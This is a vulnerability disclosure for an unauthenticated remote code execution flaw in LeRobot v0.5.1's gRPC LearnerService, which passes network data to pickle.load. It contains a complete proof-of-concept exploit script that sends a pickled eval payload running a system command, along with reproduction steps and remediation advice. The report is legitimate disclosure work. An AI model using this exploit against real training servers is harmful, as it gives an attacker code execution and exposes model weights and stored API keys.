LeRobot v0.5.1 Unauthenticated RCE in LearnerService

Below is one (1) way to reproduce RCE in LeRobot using a remote exploit that an attacker delivers over the network, without any local intervention by a third party to modify files that would allow code execution during the deserialization process.

For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).

Note: While this vulnerability is specifically verified and reported on version 0.5.1, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.

Introduction

LeRobot is Hugging Face's open-source library for state-of-the-art real-world robotics. It provides models, datasets, and simulation environments designed to democratize access to robotics AI research, allowing researchers and developers to train policies in simulation environments and transfer them directly to physical robots.

A core component of distributed robotics learning architectures is the Learner node, which coordinates policy optimization across multiple physical robot clients (Actors). Safe design of transport pipelines is crucial for preventing host machine compromise and physical control hijacking.

Vulnerability description

The LearnerService in LeRobot v0.5.1 is part of the distributed HILSerl (Human-in-the-Loop Sample-Efficient Robotic Reinforcement Learning) training architecture, which this report exercises with a Soft Actor-Critic (SAC) policy. It enables remote "Actors" (robot clients) to send episodic interaction data to a central "Learner" (server) for processing and model updates.

This service is exposed via gRPC on port 50051 by default and is completely unauthenticated. The SendInteractions method accepts a stream of data that is reassembled and then passed to an insecure pickle.load sink (bytes_to_python_object). An attacker can spoof an Actor instance and send a malicious serialized object, achieving Remote Code Execution (RCE) on the central training server.

The vulnerable code in `lerobot/transport/utils.py` (Sink):

Python (utils.py) Vulnerable Sink

def bytes_to_python_object(buffer: bytes) -> Any:
    bytes_buffer = io.BytesIO(buffer)
    bytes_buffer.seek(0)
    obj = pickle.load(bytes_buffer)  # nosec B301: Safe usage of pickle.load
    # Add validation checks here
    return obj

The vulnerable code in `lerobot/rl/learner.py` (Caller):

Python (learner.py) Vulnerable Caller

def process_interaction_message(
    message, interaction_step_shift: int, wandb_logger: WandBLogger | None = None
):
    """Process a single interaction message with consistent handling."""
    message = bytes_to_python_object(message)
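
To illustrate why handing untrusted bytes to pickle.load is unsafe, here is a minimal, harmless sketch. The class name Demo is hypothetical and the callable is the builtin sorted, chosen only because it has no side effects. The point is that the unpickler calls whatever callable the byte stream names, and the caller receives that call's return value instead of the object it expected.

```python
import pickle


class Demo:
    """Stands in for attacker-controlled data; the callable used here is harmless."""

    def __reduce__(self):
        # pickle records "call sorted([3, 1, 2])" rather than a Demo instance.
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Demo())

# The unpickler invokes sorted() while loading; no Demo object is ever rebuilt.
result = pickle.loads(blob)
print(type(result).__name__, result)  # list [1, 2, 3]
```

Any importable callable can take the place of sorted in such a stream, which is why the absence of validation before pickle.load in bytes_to_python_object matters.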

Technical Impact Analysis

Project Purpose & Context

In distributed reinforcement learning, the Learner is the most critical infrastructure component, as it aggregates experience from multiple robots to update the global policy. The LearnerService facilitates this high-bandwidth data exchange, making it a natural but insecure entry point when deployed over network boundaries.

Platform & Deployment Environment

The Learner is typically deployed on high-performance Linux or Windows servers equipped with high-end GPUs. These servers are often exposed to a local research network where multiple robot clients (Actors) connect to stream training data during long-running experiments.

Comprehensive Risk Assessment

The risk is Critical. Compromise of the Learner allows an attacker to manipulate the learning process of multiple physical robots simultaneously. Additionally, the Learner environment often contains high-value assets such as proprietary reward functions, environment simulators, and cloud API keys (Hugging Face / WandB) stored for metrics logging and model checkpoints.

Attack Scenario

Who wants to exploit a particular vulnerability?

Adversaries targeting high-tech robotics firms, academic institutions conducting sensitive autonomous systems research, or any entity looking to compromise GPU-heavy infrastructure for lateral movement.

For what gain?

Intellectual property theft (policy architectures, trained weights), infrastructure hijacking (GPU compute resources), and the ability to inject backdoors into the learned behaviors of autonomous agents.

In what way?

By establishing a gRPC stream connection to the LearnerService (port 50051) and calling SendInteractions. The attacker sends a stream of bytes that, when reassembled by the victim, forms a malicious pickle object. The RCE is triggered as soon as the Learner's main loop processes the next message from its internal queue.

Reproduction steps

On Windows (victim) - IP 192.168.1.88

(.venv) PS L:\Deserializer\PYPI-lerobot> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88

1. Create a .venv, activate it, and install the latest version of LeRobot (0.5.1) using pip install lerobot.
2. Install grpcio and protobuf as well to complete the testing environment: pip install grpcio protobuf.
3. Create a file named train_config.json with the following content:

train_config.json

{
    "job_name": "poc_hilserl",
    "output_dir": "outputs/poc_hilserl",
    "seed": 42,
    "dataset": {
        "repo_id": "lerobot/pusht"
    },
    "env": {
        "type": "pusht",
        "fps": 10
    },
    "wandb": {
        "enable": false
    },
    "policy": {
        "type": "sac",
        "n_obs_steps": 1,
        "push_to_hub": false,
        "input_features": {
            "observation.state": {
                "type": "STATE",
                "shape": [10]
            }
        },
        "output_features": {
            "action": {
                "type": "ACTION",
                "shape": [4]
            }
        },
        "actor_learner_config": {
            "learner_host": "0.0.0.0",
            "learner_port": 50051
        }
    }
}

4. Launch the Learner service:

python -m lerobot.rl.learner --config_path train_config.json

On the Raspberry (attacker) - IP 192.168.1.90

kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90

Create a file named exploit.py with the following content:

exploit.py

import grpc
import pickle
import os
import sys
import time

# Ensure lerobot modules are in path
from lerobot.transport import services_pb2, services_pb2_grpc

class RCE:
    def __reduce__(self):
        # Best Practice: Use 'eval' for self-containment and 'or {}'
        # to ensure the unpickler returns a safe object type (dict).
        return (eval, ("__import__('os').system('calc.exe') or {'Interaction step': 0}",))

def generate_messages(payload):
    # The LearnerService.SendInteractions expects a stream of InteractionMessage
    # It reassembles them using receive_bytes_in_chunks

    # Send as one chunk for simplicity, or split if testing chunking
    yield services_pb2.InteractionMessage(
        transfer_state=services_pb2.TRANSFER_END, # Signals completion to trigger processing
        data=payload
    )

def exploit(target_ip="127.0.0.1", target_port=50051):
    print(f"[*] Attacking LearnerService at {target_ip}:{target_port}...")

    payload = pickle.dumps(RCE())

    channel = grpc.insecure_channel(f"{target_ip}:{target_port}")
    stub = services_pb2_grpc.LearnerServiceStub(channel)

    print("[*] Initiating SendInteractions stream...")
    try:
        # Call the vulnerable streaming method
        stub.SendInteractions(generate_messages(payload))
        print("[+] Stream finished. Triggering processing...")

        # We might need to wait a moment for the Learner main loop to pick it up from the queue
        time.sleep(2)
        print("[+] Check target for execution.")
    except grpc.RpcError as e:
        print(f"[!] gRPC Error: {e.details()}")

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    exploit(target)

Run the exploit to trigger the RCE:

python exploit.py 192.168.1.88

On the Windows victim machine, the payload's calc.exe command runs when the Learner deserializes the message.

Executive Summary: RCE via Insecure Pickle Deserialization in `LeRobot` LearnerService

The research identifies a critical Remote Code Execution (RCE) vulnerability in the LearnerService of LeRobot v0.5.1.

Root Cause: The LearnerService exposes an unauthenticated gRPC SendInteractions method that reassembles stream data and passes it to an insecure pickle.load sink (bytes_to_python_object).
Exploitation Mechanism: By establishing a gRPC connection to the default port (50051), an attacker can spoof an "Actor" node and transmit a crafted, malicious serialized object. The Learner service automatically deserializes this payload upon arrival in the main processing loop, resulting in immediate code execution.

Analysis of Scope and Security Implications

This vulnerability is of critical severity, as it targets the core infrastructure of distributed robotic training systems.

1. Infection Scenarios

Distributed Infrastructure Hijacking: In a typical HILSerl deployment, the Learner acts as the central command node. An attacker who gains network access to the LearnerService port can execute arbitrary code on the high-performance GPU servers hosting the training process.
Robot-to-Server Pivot: If a single robotic client ("Actor") is compromised via other means, the attacker can use that node to propagate the exploit to the central Learner, effectively poisoning the entire training pipeline.

2. Factors Exacerbating Risk

Zero Authentication: The gRPC service operates without any authentication mechanisms, meaning any device on the network can interact with the Learner and trigger the vulnerable deserialization sink.
High-Value Target Environment: These systems often handle sensitive intellectual property, such as proprietary reward functions, trained model weights, and cloud provider credentials (e.g., Hugging Face, WandB) used for experiment logging, all of which are exposed to the attacker.
Complex Dependencies: By compromising the Learner, an attacker can inject backdoors directly into the policy architectures being learned by the robots, leading to long-term impact on autonomous agent behavior.
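
Because any device that can reach the port can trigger the sink, one inexpensive pre-flight check is whether the Learner is configured to listen on all interfaces, as the train_config.json in the reproduction does with learner_host set to 0.0.0.0. The sketch below is an assumption-laden illustration: the helper name binds_all_interfaces is hypothetical, and the only configuration keys it reads are the ones shown in this report. It reduces exposure only and does not fix the deserialization flaw.

```python
import ipaddress
import json


def binds_all_interfaces(config: dict) -> bool:
    """Return True if learner_host is an unspecified address (0.0.0.0 or ::)."""
    host = (
        config.get("policy", {})
        .get("actor_learner_config", {})
        .get("learner_host", "")
    )
    try:
        return ipaddress.ip_address(host).is_unspecified
    except ValueError:
        # Hostnames and empty values are not evaluated in this sketch.
        return False


# Same key layout as the train_config.json used in the reproduction steps.
config = json.loads(
    '{"policy": {"actor_learner_config":'
    ' {"learner_host": "0.0.0.0", "learner_port": 50051}}}'
)

if binds_all_interfaces(config):
    print("warning: LearnerService would listen on every network interface")
```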

Conclusion and Recommendation

This is a critical-severity vulnerability. The combination of network-exposed gRPC streams and pickle-based deserialization creates a direct path for complete system compromise.

Suggested actions for the development team:

Remove Pickle: Immediately replace pickle.load in bytes_to_python_object with a secure, non-executable data serialization format, such as Protobuf or msgpack (with strict type validation).
Implement Authentication: Add mandatory authentication (e.g., mutual TLS or API keys) to the gRPC SendInteractions method to prevent unauthorized access.
Input Validation: If serialization must be complex, implement rigorous allow-listing and integrity signatures to ensure only data from trusted Actors is processed.
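
The allow-listing and integrity-signature ideas above can be sketched with the standard library alone. This is not LeRobot's API. The names sign_message, verified_loads, AllowListUnpickler, and ALLOWED_GLOBALS are hypothetical, the shared key is assumed to be distributed to trusted Actors out of band, and the empty allow-list assumes interaction messages contain only plain containers and scalars. It is a stopgap sketch; replacing pickle with a non-executable format remains the stronger fix.

```python
import hashlib
import hmac
import io
import pickle

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes

# Assumption: messages are plain dicts/lists/numbers/strings, which pickle
# encodes without any global lookups, so nothing needs to be allowed here.
ALLOWED_GLOBALS: set[tuple[str, str]] = set()


class AllowListUnpickler(pickle.Unpickler):
    """Refuses to resolve any global that is not explicitly allow-listed."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def sign_message(payload: bytes, key: bytes) -> bytes:
    """Prefix the payload with an HMAC-SHA256 tag (sender side)."""
    return hmac.new(key, payload, hashlib.sha256).digest() + payload


def verified_loads(blob: bytes, key: bytes):
    """Check the tag first, then unpickle with the allow-list (receiver side)."""
    tag, payload = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("message signature mismatch")
    return AllowListUnpickler(io.BytesIO(payload)).load()


key = b"\x01" * 32  # placeholder key for the example only
message = {"Interaction step": 3}
print(verified_loads(sign_message(pickle.dumps(message), key), key))
```

The signature check rejects senders that do not hold the key, and the allow-list limits the damage if a key-holding Actor is itself compromised, which is the Robot-to-Server pivot described earlier.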